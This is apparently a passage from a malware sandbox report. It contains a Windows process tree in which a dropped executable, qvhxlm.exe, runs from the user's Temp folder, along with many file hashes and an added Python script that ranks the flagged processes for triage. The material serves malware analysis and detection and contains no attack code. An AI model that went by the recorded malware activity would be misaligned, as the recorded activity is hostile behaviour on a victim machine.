      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
      PID: 4248

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 3740

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6128 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:13⤵PID:1004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:13⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:13⤵PID:3436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:13⤵PID:1892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:13⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=1996 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=5184 /prefetch:83⤵PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6664 /prefetch:83⤵PID:2404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:13⤵PID:2312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:13⤵PID:492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:13⤵PID:3200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:13⤵PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4768 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
-
C:\Users\Admin\AppData\Local\Temp\qvhxlm.exe"C:\Users\Admin\AppData\Local\Temp\qvhxlm.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5608
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4776
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:448
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004C01⤵PID:2716
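The tree above records image path, command line, nesting depth and PID for every process, but a text copy of it runs those fields together on one line per process, and the sandbox tags Edge's own utility processes ("EnumeratesProcesses") with the same weight as the one line that matters for triage: the dropped qvhxlm.exe executed from the user's Temp directory. The parser below is an added example and is not part of the tria.ge report or its tooling. It splits the flattened lines back into fields, attaches the signature tags and PID that follow a line when tags are present, and ranks tagged processes so that non-browser images and anything running from a user-writable directory come first. The sample input is a constructed subset of this tree with most command-line switches omitted; USER_WRITABLE and BROWSER_IMAGES are the example's own assumptions, not sandbox output.

```python
"""Parse a tria.ge process tree that has been flattened to text and rank the
entries for triage. Added example; not part of the tria.ge report or tooling."""
from dataclasses import dataclass, field
from typing import List, Optional

# Directory fragments an unprivileged user can write to (assumption for this
# example). An image running from one of these deserves a look whatever the
# sandbox tagged it.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Images whose sandbox tags are routine browser behaviour (assumption).
BROWSER_IMAGES = {"msedge.exe", "identity_helper.exe"}

# Constructed subset of the tree above, in the flattened text form
# (image + command line + depth digit + "⤵", PID on the same line or after tags).
SAMPLE = r'''
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US --renderer-client-id=5 /prefetch:13⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --service-sandbox-type=none /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
C:\Users\Admin\AppData\Local\Temp\qvhxlm.exe"C:\Users\Admin\AppData\Local\Temp\qvhxlm.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5608
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4776
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004C01⤵PID:2716
'''


@dataclass
class Proc:
    depth: int
    image: str
    cmdline: str
    pid: Optional[int] = None
    tags: List[str] = field(default_factory=list)


def split_image(body: str):
    """Split '<image><cmdline>' where the command line starts with the image
    path again, either quoted ("C:\\x.exe" args) or bare (C:\\x.exe args)."""
    for i in range(1, len(body)):
        prefix, rest = body[:i], body[i:]
        if rest.startswith('"' + prefix + '"') or rest.startswith(prefix + " ") or rest == prefix:
            return prefix, rest
    return body, ""


def parse_tree(text: str) -> List[Proc]:
    """A process line ends with '<depth>⤵'; the PID is either on the same line
    ('PID:n') or, when signature tags follow, after one or more '- <tag>' lines."""
    procs: List[Proc] = []
    cur: Optional[Proc] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":          # empty bullet residue
            continue
        if "⤵" in line:
            body, _, tail = line.partition("⤵")
            if not body[-1:].isdigit():
                raise ValueError("no depth marker: " + line[:60])
            image, cmdline = split_image(body[:-1])
            cur = Proc(depth=int(body[-1]), image=image, cmdline=cmdline)
            procs.append(cur)
            if tail.startswith("PID:"):
                cur.pid = int(tail[4:])
        elif cur is not None and line.startswith("PID:"):
            cur.pid = int(line[4:])
        elif cur is not None and line.startswith("- "):
            cur.tags.append(line[2:])
    return procs


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def findings(procs: List[Proc]):
    """Processes with sandbox tags or a user-writable image path, non-browser
    images first so a dropped payload is not buried under Edge utility noise."""
    out = []
    for p in procs:
        reasons = list(p.tags)
        if any(frag in p.image.lower() for frag in USER_WRITABLE):
            reasons.append("image in user-writable directory")
        if reasons:
            out.append({"pid": p.pid, "depth": p.depth, "image": p.image,
                        "browser": basename(p.image) in BROWSER_IMAGES,
                        "reasons": reasons})
    return sorted(out, key=lambda f: (f["browser"], f["pid"] or 0))


if __name__ == "__main__":
    for f in findings(parse_tree(SAMPLE)):
        print(f["pid"], f["image"], "; ".join(f["reasons"]))
```

On the sample, findings() puts PID 5608 (qvhxlm.exe, dropped EXE, user-writable path) ahead of the Edge utility process PID 3740, which carries only the generic EnumeratesProcesses tag. The depth value is the nesting level tria.ge shows, not a parent PID, so parent-child links beyond "one level up" are not recoverable from the text form.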
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: df472dcddb36aa24247f8c8d8a517bd7
  SHA1: 6f54967355e507294cbc86662a6fbeedac9d7030
  SHA256: e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
  SHA512: 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
- Filesize: 10KB
  MD5: 9696a6a9078f1a0cb2ec3f0a88054935
  SHA1: 4c71f02709f6d309f8930d484af6dd66bd294abe
  SHA256: 8c43e0dcabb9a55f31c320600dae8fa932bfbbf3c7d324b2b8943d289e5dad0d
  SHA512: eb60d8e0e28f7de6d00fa8c3972af08fe037e7681744a40bb4eaffd6d6b7d8d03a93d2bc88a5349b178cac7d7c59f84d21e6a8c80913c5c4596623e08f0a896b
- Filesize: 152B
  MD5: 228fefc98d7fb5b4e27c6abab1de7207
  SHA1: ada493791316e154a906ec2c83c412adf3a7061a
  SHA256: 448d09169319374935a249b1fc76bcf2430b4e1436611f3c2f3331b6eafe55a2
  SHA512: fa74f1cc5da8db978a7a5b8c9ebff3cd433660db7e91ce03c44a1d543dd667a51659ba79270d3d783d52b9e45d76d0f9467458df1482ded72ea79c873b2a5e56
- Filesize: 152B
  MD5: 026e0c65239e15ba609a874aeac2dc33
  SHA1: a75e1622bc647ab73ab3bb2809872c2730dcf2df
  SHA256: 593f20dfb73d2b81a17bfcc1f246848080dfc96898a1a62c5ddca62105ed1292
  SHA512: 9fb7644c87bdd3430700f42137154069badbf2b7a67e5ac6c364382bca8cba95136d460f49279b346703d4b4fd81087e884822a01a2a38901568a3c3e3387569
- Filesize: 41KB
  MD5: 70880e42f07b0386e261974cd14820a1
  SHA1: 2d34d398b398a7fd88d21fae7642cdca908bf3ee
  SHA256: e739aff9b4d02c264341d6d4872edcda28e79373aeda936f659566a1cd3eb47f
  SHA512: 6a5cb0cbee5f49a4b96df82bc37f3f2aa7abbc8fdb304962a3f492c7f63772b81e753a86e01da2a7a74785cf3196795408065e0bf30695166311e324d813d83c
- Filesize: 19KB
  MD5: 8f572db879dfb8dbdb422ec64baa5768
  SHA1: ca999d899b6e58090b3bb84686c83cf4c335d66a
  SHA256: 5739988bf10a3a32b8c39fbbbde50925df7c96bec958e657657e10646f449d3c
  SHA512: 2bf87949aa2df090ab9ad5996348bb9dd30718bd098dd9cd017a14aaf3fa076bc370160ee5195a72e8201a7a505bca8f81aa964983bce0a2ce11c52d6d70d4d9
- Filesize: 44KB
  MD5: 386c543f64966a2cb9a8471ad20bc459
  SHA1: 3f8f79c558ad98187f15cd9b8b399147cb3388ee
  SHA256: 594a5d4bd07d20f5317247bf2decc7ccd941c44de82ebb24672dcefae4fc9cdf
  SHA512: 8a57b196ff69571790dff0d88029a1f9b929dd25dc04af78aa234738aad1e7b1b3ae8bf37da7ba19995f5b4fb1cad269c918a884d7ddf46c6a5794def37d7ccf
- Filesize: 36KB
  MD5: 768eea899675a3c3c67d54a000ad769a
  SHA1: 1bf36c31b41e48a2d79f3ada47c396f8d472aaae
  SHA256: 18df9f0c9e11ff35fa1eddeb0b9325e256935ecacb2f741314afbff944487b74
  SHA512: 0c7aa12c0243a835f0acc7c32f103bde2dfac055342e879a20713ac1cc79a8ff2b6b0aab7ff90b8be99ed401693dcec1e531e8adcad894ab3addef74b5c80f3a
- Filesize: 32KB
  MD5: 41afd8cfe41cd077acff8c4d1a8700a0
  SHA1: 28ab15ad49f8cb2c066b864fa8e064c4c92d50b0
  SHA256: ea4af63be356e06e6cb404996cd4041b498350515942aedd26edc1354133a9da
  SHA512: a396e9fbf4819aa9ace339a0bf521ea9183bf7a66bb0ff455a4bdd4dff0cd980bf9344de504d4d9f72d833a0904b3cca3b5faf275fedd7cea9b58fca2d33e8e2
- Filesize: 23KB
  MD5: baffacc6078586c6dddf34165e6811da
  SHA1: 534b63920939678bad3ea04a290e91f9c745d832
  SHA256: 6abc15e45b2af3ce2d8bcb223a011e2f16d8b799333e21453159fa3c46987bf4
  SHA512: d3def5d200b2793319b41846becf2cef1fb8155771d53f1139a765f3354909ccd5eb73a1b285e7f9c2cc7db15ce49684a8444272ed349c034fc71037c7df635c
- Filesize: 22KB
  MD5: 249cd8391d1be217b43210942d16b3c1
  SHA1: 7b5cbe76d3afd8835fb63c9eea72033ffb0a1c2a
  SHA256: 1dbbb439adb0249c0704468fe5f3d711a622029fe2480ee7ce33f7f4f69dacb2
  SHA512: 922876ebaa39485c8bc7a923e59fb819d49b6676364401a64942f9155603ef4ac0cfb5c480961b55d7e0291561632e6d97c7af21f21cb59b7f3bb62b06b3ad0f
- Filesize: 18KB
  MD5: 0e03c00d9deccd3dbd28ea7f586f0ba9
  SHA1: 3b3c038025366c984f1c2860f9d8686ea0f47b69
  SHA256: d681cb11261fe9af7057171cb428e6d0f94045f066d2fde47e8bf6306e94e283
  SHA512: c6f8c80060e7514e99b2545da17dfe7622b45ba6795d4056c676c15b4a4707ad1dac9e518d9743da786e28be6e7d5f171efcdd99ae349eb8f387c310502f1fcc
- Filesize: 1024KB
  MD5: 7653ed1aa2a54f28064180e8860c334d
  SHA1: e84b99451d868c592f13d5c98b8ffe17784668e3
  SHA256: b2f9164a31ceda2ffe0628070acc7e47b928d8c3b6c31bcfd59a0d32a4208364
  SHA512: f22e657ba006c09d2eb711223615ff1bf544ae0da00c2feef0f80b3f85deec7e71dd0ef966ba2e8dc682eddc5aa8adacae070c93ac867883d248155b8cfd0e33
- Filesize: 1024KB
  MD5: 428ff1ac3ce2c4453eda8d22c4260b27
  SHA1: 7ac34f3fa075459aae5f00579adb0f8af66bcfda
  SHA256: 5e21b684d1423fd501eccabed11d155887cd6a8a485161127cf2fa2d55406ba1
  SHA512: 134d37f4509fa565d1d27fdfa3d2d1e86df5484aaffb2380df9453cf39807ef94a92f41d1bd6d50a63a3ea872b1d21dfc65cd088cbcb4416afcbfa1ab7eff77f
- Filesize: 1024KB
  MD5: 19756d5e06ee30af80bf8470522adc98
  SHA1: 45801241647406251978f133990b0e553fa2b26d
  SHA256: e61bf27dc4f42d5e7183def20da8ec1cf29e7900a6c6b0ba42d12094b717e5f0
  SHA512: 5860d6417cf2b2d8ec726a1c71662d3ce578cdc5f45ea4e9fe3640c9c6b91c2f80bf7f2df69dc992491425925103dc4d7cea60448aadb4fbe7df4b20ba8e2043
- Filesize: 1024KB
  MD5: 454fbede9cb260a4863e6e156963580a
  SHA1: c9e2ef73e6dc613f29882c8e03dae387075ec6be
  SHA256: 08814992e9db8d239f1b2d16918af644a409881f01e886155f029fd4b04a547d
  SHA512: 675f595729938b992da79aa428536bcc468962820f22a754c93df814e52563571291157dd83253355d65df946e64c235e06e3b6f7d3ee19d9ab3a74cc4733679
- Filesize: 1024KB
  MD5: fb9372d89b5c850c41cf779f8e93869b
  SHA1: b6541e1e628bc366071362a8ebfbf515eb0e9391
  SHA256: d621d9ac8f4cbe9c1adf5318b393bdf5d7ff134283bf4ac0645c4f86ab608260
  SHA512: 22aa6eedfd81728bd551d1c2d244bcf4830e9dc4ee474482204b4f78fa24cfb20ca5715421f6ff19ac2c9025a08c7558f08e04e2d78f822a99a145a61def7855
- Filesize: 840B
  MD5: 0ddacdbcc6b2dae71a93a2bd04afd763
  SHA1: 304ad496a8caa81c5f75c01935085008802882a5
  SHA256: 5be6d62791f00444ccb9433e3e7e02ea1a92925e3baa49862c01d60d2ae3208a
  SHA512: cc2906c7bbb19c3de89e4cd3af46bab7b9f57db5c5fe4b5ee5d533e05b5c1f9b969c1dd8951fbeb557566642d1ad72427fbc289542e9838b3029bd82e4b4e62a
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 888B
  MD5: 754cbf857ff0d8793d8d580ba21fdca1
  SHA1: 20f2c5ad4fbc117e775205f7ce1c1bae0e826b74
  SHA256: 1c74005bd8f8d542b50c97d0d255bfdc7e88d7226a08bdd7871efe078df5483f
  SHA512: 80fb0f4baba192507a3ced2bc8b2d70874adbaadadfbf0016d220c2194836151672a40e00ae21338e5e3bf4539199e0ec5476a6bcce563e465ad73134a647cb6
- Filesize: 2KB
  MD5: 9875a03e85bcebb72660bc2cb2e84926
  SHA1: 9dc34abb7aa09a14d062d394b1afbd94403b5ce6
  SHA256: b475a7792c942bbd203e378f3d54dc7ea7a0123735c298ebd69f0b60b993bc27
  SHA512: 343cc90b6c3d8990930e9a7433c099d6816a7fd180c8047da6dd55a7d64aa2593eea9459cb9d6022ff5fac05dc64dd96841fe628d15b8ed7d1983df2d3783e72
- Filesize: 2KB
  MD5: efecc4dbbcedbca2d1450be42f165c04
  SHA1: 835756102cec862317fa3d43b33ce81746c7221b
  SHA256: fea6be0306610baaf18dfe07a4a63bd42885b3b0fd70bec426c63dde75e70f2d
  SHA512: a912a7a4f2b42dd813461f1b57f779fb5b9da8dd1705cfc1066cf191fae991df41b432381131dd8aedaef2af3966ceef33f329a176f8ce45569987bb13196bb0
- Filesize: 2KB
  MD5: 72458bb2da0bc22265af2da249fa6780
  SHA1: 7ae513bfa3df81947d557c4c90171facbfaf14e0
  SHA256: e5cf2d9bcc358b092aa94b5f372e55ec28623125a34b2c56be88328faabfdb84
  SHA512: ef5196d7ade123bbfa02d7f9489a24add5c4497502fcee5205a7d5d3bf7f857ec6389fdd1079f950cd88d910f858dd321a7a8fe5024f2c602c8695f9714bde6d
- Filesize: 5KB
  MD5: 0f16c5ea438449213230a843245311c8
  SHA1: 87c63595fe53a296ea6123e0090ea053c7fe6845
  SHA256: 5b645810414500d1dc393fc65572641e6e3710c1322c904d6a00f44c41125285
  SHA512: 4b36cddbab9b7f7acb090f6ef17bf71375f6bbf059891d597f21f78918ec961d6a10a253c84c2f18847523017e977df6fe1a83d3f7ed24ca2e58e994a0e0e4c5
- Filesize: 6KB
  MD5: a73869194e51a5aba929eebe82e93518
  SHA1: 7a92127acd2cc9389576bfaf910f15c1811359df
  SHA256: 8132eaa67169c6cbc1cea40a44e222fb40a26725aad89f9308ba0129e497240e
  SHA512: e2b114fd3b6b110bbd6dda7efba46172e543532bd606900c9843b8ed5fea7e42c26c388173751a739880cc4443a14a0f3133cecddcfa517184efbfca5d959624
- Filesize: 6KB
  MD5: 4fdcd173b8462310a6b7dc6649057112
  SHA1: 00827a9bbf5ad46aae4776360ab76e9970b0f66f
  SHA256: 364c01662ee63971a59c18689a36112fbfa80d1e874f802d24ae72c15dac754b
  SHA512: 030457c8efc56db1d4cd8769ff9720bb420a7c86ff9bb2cf38b6b1dec4d2ba4d9168e947bd2c3711755251a3cd63c9cbc1ad0456cf2044e570e48b4caa2e79fe
- Filesize: 1KB
  MD5: 2902fd5a572bdaa26900275add59edb0
  SHA1: 0b12e4549b91c43dc836d843c1617a17ef09be5b
  SHA256: 10081d03eecbc7f430c36ee603d6fafe4573b3b87c00109664495e87212d9238
  SHA512: 91cbfff260738ef068069428ccdeae79009dcab4c026be5e4b00773f5d6bf2baaba5ae4b15fd2fcdb9c45f4ba917ef9c27ba4af01ae7cf6267afdd4a1f15e924
- Filesize: 1KB
  MD5: 25f0234b002dedef2217943cb226cd4c
  SHA1: 927397963eb69d270c9955472bbd7d0adfd5fcaa
  SHA256: adce96a94a7cd004142aac8161d3d02b7b7e677d3aae825007884c291c30c29a
  SHA512: dbd3d5ac5901a76d5d0a528b58b0981b318efa80d7e75178634dd9490051057d1c820035b1e6e60fc1b0535f6fb39188afcbc6a88c1af0c6f957400c4d4101ad
- Filesize: 1KB
  MD5: 4d5b1995926b91dffeaf5127d39e1f46
  SHA1: 567c0187477251a0adfd4360eeec40c72b03c1ab
  SHA256: 66875a00258cfae24b815c6038f2c01d9465caf116deafde2a84e17f5fdb8e41
  SHA512: ddea44c3df7ddb30363b1555da923bec610d56edd340bf63612486948260e1cf2a65124975f43eda723e0d786b076237cf730acbba2f5998f7fa145d29951d3f
- Filesize: 204B
  MD5: 837a422bd3d5632f006bd81b96ce1a57
  SHA1: 8ce1cdb6028d8cead79cacc1aeb6e0ec7a7393c3
  SHA256: 8223e5b520a996644cf842d35652c3f6f93aa7f88e5c83eee27d76dff12df122
  SHA512: 80f67f61f8e45dfe78374ca723a4bcd91096b35821d564aa585f5c7bb77d525f248000b39a932fea99f2da21203384edbd3dc66248a38686f57fb46673504779
- Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
- Filesize: 16B
  MD5: 206702161f94c5cd39fadd03f4014d98
  SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
  SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
  SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
- Filesize: 11KB
  MD5: 36b190c65060a1ae9990e6a327ca1680
  SHA1: 2f8858d5a39acf726cdbed2e7e8cfab220c5027e
  SHA256: 67be18807f028680d51e0d8db8451dd1aa810d7f89183a49cc7079bd7df7915f
  SHA512: 86bffce47261cfd7144f801a474d6f9fffb5c711d5451f222f719264a9801e41a637fbf741ba4c9aac044db7b9519336ce225e5a297f8d9be3fc11425b09da44
- Filesize: 944B
  MD5: df7c4aad87c693b2f7696ab9abec5af9
  SHA1: 9626646efc2b6798a4099741408963d27e043092
  SHA256: edebf7d0694680a8c93d99f2348c2960efd9daead29484c125a3ed8d05756e2b
  SHA512: 9a2a750d65ee3942c17a544625eeea4328f6a8dd585d8b4a41d9cac604e55d46f320f2926ab30a566e0c5fbf894c1b0f4e42b5dd7b4d068631882a4dab28bc07
- Filesize: 944B
  MD5: b0a85f07903eaad4aace8865ff28679f
  SHA1: caa147464cf2e31bf9b482c3ba3c5c71951566d1
  SHA256: c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5
  SHA512: 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd
- Filesize: 944B
  MD5: 0b59f3fa12628f63b5713c4833570d7f
  SHA1: badcf18f1fdc94b1eadf63f27c09ad092c4a6ccb
  SHA256: 2332e52881483559d787508831c00192c4f0a4fedc232b0309e566a30247af1d
  SHA512: 01724fd9f7a20ec5ff3d2686593d5d95069135834e9b156ced36985067fb36e7b3ec2a0018e41fa125ad5d1e42c80be9e148632a9b655f2d41c1400a4320abe7
- Filesize: 400B
  MD5: c6215e2786940a2fd457939c0421ae4b
  SHA1: e6868ec131f7c916a19dde06dd0e88b851f301b1
  SHA256: 8bc4c4eea93fbf62cdd94e700c900c7c7443166a6ead2924922fd1fedc1ca2da
  SHA512: 96f32843a8b7f895107cb2d6755de0ddeb3cdb9d6002eca12b16507fd9f19f58f472cffd6286b3edf95b76c88d6061a2a112f5f0878093ea739b365daaca9518
- Filesize: 1KB
  MD5: eb15ee5741b379245ca8549cb0d4ecf8
  SHA1: 3555273945abda3402674aea7a4bff65eb71a783
  SHA256: b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
  SHA512: 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
- Filesize: 944B
  MD5: 157d441b822e5ab65ce9b637ed3fac0e
  SHA1: cb52ec698b579995be1cd214cf490f74b77f5857
  SHA256: bcbfb5b5c9ec1f0bacbd6ca28c35ac999a56de3899aea5e1c607e178f8baede5
  SHA512: b5be1b9d4d41104c4fe67377ce690f6afafdeb80282ae05a42ee4912efacda0d077b101492dfebcc10f8e059a7e2e15fbe43f76e308046cd28e562a2e78fe8fa
- Filesize: 944B
  MD5: 781da0576417bf414dc558e5a315e2be
  SHA1: 215451c1e370be595f1c389f587efeaa93108b4c
  SHA256: 41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe
  SHA512: 24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737
- Filesize: 292KB
  MD5: 06aa0446d6ce7b7d44270ef4218793cf
  SHA1: 2ae7b6b80a4025c262aa6f38db7bd1ece676648d
  SHA256: db7b93708805fbcf98f5fd0068b24becf4e1f11371ed2f6f58e3bafb9c272068
  SHA512: 49220519f8f773bd0c74e2eb8cec902071026741ecd88453d2c4dc5ee78175f67320c9cba0d81e9858f1180573df0068ab570a967af5d7076e803ad71d9a6971
- Filesize: 60B
